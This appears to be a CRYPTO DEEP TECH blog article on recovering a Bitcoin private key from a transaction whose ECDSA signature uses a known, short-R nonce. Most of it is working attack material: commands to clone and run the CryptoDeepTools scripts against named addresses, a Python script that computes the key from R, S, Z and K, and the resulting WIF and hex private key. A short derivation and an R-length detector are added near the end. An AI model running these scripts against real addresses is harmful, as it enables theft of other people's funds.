Bitcoin Wallet Recovery via ECDSA Short Signatures



We all know that disclosure of the secret key in an ECDSA signature can lead to the complete recovery of a Bitcoin Wallet. In our earlier articles we looked at weaknesses and vulnerabilities in blockchain transactions, but there are also ECDSA short signatures that lead to the full recovery of a Bitcoin Wallet.

Why are these ECDSA signatures called short?

You can get the answer to this question from the topic under discussion: «The shortest ECDSA signature»

In our last article, «Reducing the private key through scalar multiplication using the ECPy + Google Colab library», we created a Python script, maxwell.py, which generated a rather interesting public key for us:


(0x3b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63 , 0xc0c686408d517dfd67c2367651380d00d126e4229631fd03f8ff35eef1a61e3c)

As we know, the signature value "R" is the public key of the private key (Nonce).

Take a look at Blockchain transaction: 11e6b169701a9047f3ddbb9bc4d4ab1a148c430ba4a5929764e97e76031f4ee3



The size of this transaction is only 156 bytes.

How can I restore a Bitcoin Wallet through ECDSA short signatures?

In the cryptanalysis of the Bitcoin blockchain, we use our own Bash script: btcrecover.sh


pip2 install -r requirements.txt
chmod +x btcrecover.sh

./btcrecover.sh 12yysAMhagEm67QCX85p3WQnTUrqcvYVuk

./btcrecover.sh 15HvLBX9auG2bJdLCTxSvjvWvdgsW7BvAT


| privkey : addr |

Let’s open bitaddress and check:


Let’s move on to the experimental part and analyze in more detail all the scripts for restoring a Bitcoin Wallet

Open [TerminalGoogleColab].

Let’s use the «09BitcoinWalletRecovery» repository.

git clone https://github.com/demining/CryptoDeepTools.git

cd CryptoDeepTools/09BitcoinWalletRecovery/



Install all the necessary modules:


pip2 install -r requirements.txt

Using the breakECDSA.py script, we extract the signature values [R, S, Z] from the RawTX:

python2 breakECDSA.py 0100000001afddd5c9f05bd937b24a761606581c0cddd6696e05a25871279f75b7f6cf891f250000005f3c303902153b78ce563f89a0ed9414f5aa28ad0d96d6795f9c6302200a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8012103151033d660dc0ef657f379065cab49932ce4fb626d92e50d4194e026328af853ffffffff010000000000000000016a00000000 > signatures.txt

The result will be saved to a file: signatures.txt

Let’s open the file: signatures.txt

cat signatures.txt


R = 0x00000000000000000000003b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63
S = 0x0a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8
Z = 0x521a65420faa5386d91b8afcfab68defa02283240b25aeee958b20b36ddcb6de

As shown in our last article, we know the secret key used to generate the signature value R.

In our case, the secret key (Nonce) is:

0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0 --> 0x3b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63, 0x3f3979bf72ae8202983dc989aec7f2ff2ed91bdd69ce02fc0700ca100e59ddf3


K = 0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0
R = 0x00000000000000000000003b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63
S = 0x0a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8
Z = 0x521a65420faa5386d91b8afcfab68defa02283240b25aeee958b20b36ddcb6de

Now that we know the values of [K, R, S, Z], we can get the private key using the formula and restore the Bitcoin Wallet.
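The formula follows from the ECDSA signing equation. The derivation below is added here for clarity and is not part of the original article; it uses the page's symbols K, R, S, Z and the group order N, and writes d for the private key (the symbol d is an assumption, the page does not name it).

$$S \equiv K^{-1}\,(Z + R\,d) \pmod{N}$$

$$S\,K \equiv Z + R\,d \pmod{N}$$

$$d \equiv (S\,K - Z)\,R^{-1} \pmod{N}$$

Here $R^{-1}$ is the modular inverse of R modulo N. Once the nonce K behind a signature is known, the private key is determined by the public values R, S and Z alone.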

To get the private key, let’s use the Python script: calculate.py

# Helper: hex string without the "0x" prefix
def h(n):
    return hex(n).replace("0x", "")

# Extended Euclidean algorithm: returns (gcd, x, y) with aa*x + bb*y = gcd
def extended_gcd(aa, bb):
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

# Modular inverse of a modulo m
def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m

# Order of the secp256k1 group
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

K = 0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0
R = 0x00000000000000000000003b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63
S = 0x0a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8
Z = 0x521a65420faa5386d91b8afcfab68defa02283240b25aeee958b20b36ddcb6de

# Private key = ((S * K) - Z) * R^-1 mod N
print (h((((S * K) - Z) * modinv(R,N)) % N))

Let’s run the Python script: calculate.py

python3 calculate.py


Let’s open bitaddress and check:

ADDR: 15HvLBX9auG2bJdLCTxSvjvWvdgsW7BvAT
WIF: L3LxjEnwKQMFYNYmCGzM1TqnwxRDi8UyRzQpVfmDvk96fYN44oFG
HEX: b6c1238de89e9defea3ea0712e08726e338928ac657c3409ebb93d9a0873797f


Private key found!

Bitcoin wallet restored!

ECDSA short signatures are a potential threat of losing BTC coins, so we strongly recommend that everyone always update their software and use only verified devices.
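A check that a wallet or a monitoring tool could run before accepting or broadcasting a signature, as an added example that is not code from the original article or from CryptoDeepTools: it parses the DER signature taken from the scriptSig of the raw transaction above and flags an R value that is unusually short or that matches the publicly known nonce quoted on this page. The function names and the 28-byte threshold are assumptions of this example.

```python
# Added example: flag ECDSA signatures whose R value is suspiciously short.
# Function names and the length threshold are assumptions of this example.

# R for the publicly known nonce K quoted in the article (value from the page).
KNOWN_WEAK_R = {0x3b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63}

# Signature push copied from the scriptSig of the raw transaction above
# (DER signature followed by the one-byte sighash flag 0x01).
PAGE_SIG = bytes.fromhex(
    "303902153b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63"
    "02200a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8"
    "01"
)


def parse_der_sig(blob):
    """Return (r, s, sighash) from a DER signature plus sighash byte."""
    if len(blob) < 9 or blob[0] != 0x30:
        raise ValueError("not a DER SEQUENCE")
    if blob[1] >= 0x80 or blob[1] != len(blob) - 3:
        raise ValueError("bad SEQUENCE length")
    pos, ints = 2, []
    for _ in range(2):  # two INTEGERs: r, then s
        if pos + 2 > len(blob) - 1 or blob[pos] != 0x02:
            raise ValueError("expected INTEGER")
        size = blob[pos + 1]
        end = pos + 2 + size
        if size == 0 or size > 33 or end > len(blob) - 1:
            raise ValueError("bad INTEGER length")
        ints.append(blob[pos + 2:end])
        pos = end
    if pos != len(blob) - 1:
        raise ValueError("trailing bytes inside signature")
    return ints[0], ints[1], blob[-1]


def check_signature(blob, min_r_bytes=28):
    """Return a list of findings; an empty list means nothing was flagged."""
    r_raw, _s_raw, _flag = parse_der_sig(blob)
    r = int.from_bytes(r_raw, "big")
    r_len = (r.bit_length() + 7) // 8  # length without DER sign padding
    findings = []
    if r in KNOWN_WEAK_R:
        findings.append("R matches a publicly known nonce")
    if r_len < min_r_bytes:
        findings.append("R is only %d bytes" % r_len)
    return findings
```

A random R loses one leading byte with probability of about 1/256 per byte, so a 21-byte R like the one in this transaction almost never arises from a properly generated nonce.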

This video was created for the CRYPTO DEEP TECH portal to ensure the financial security of data and cryptography on elliptic curves secp256k1 against weak signatures ECDSA in cryptocurrency BITCOIN


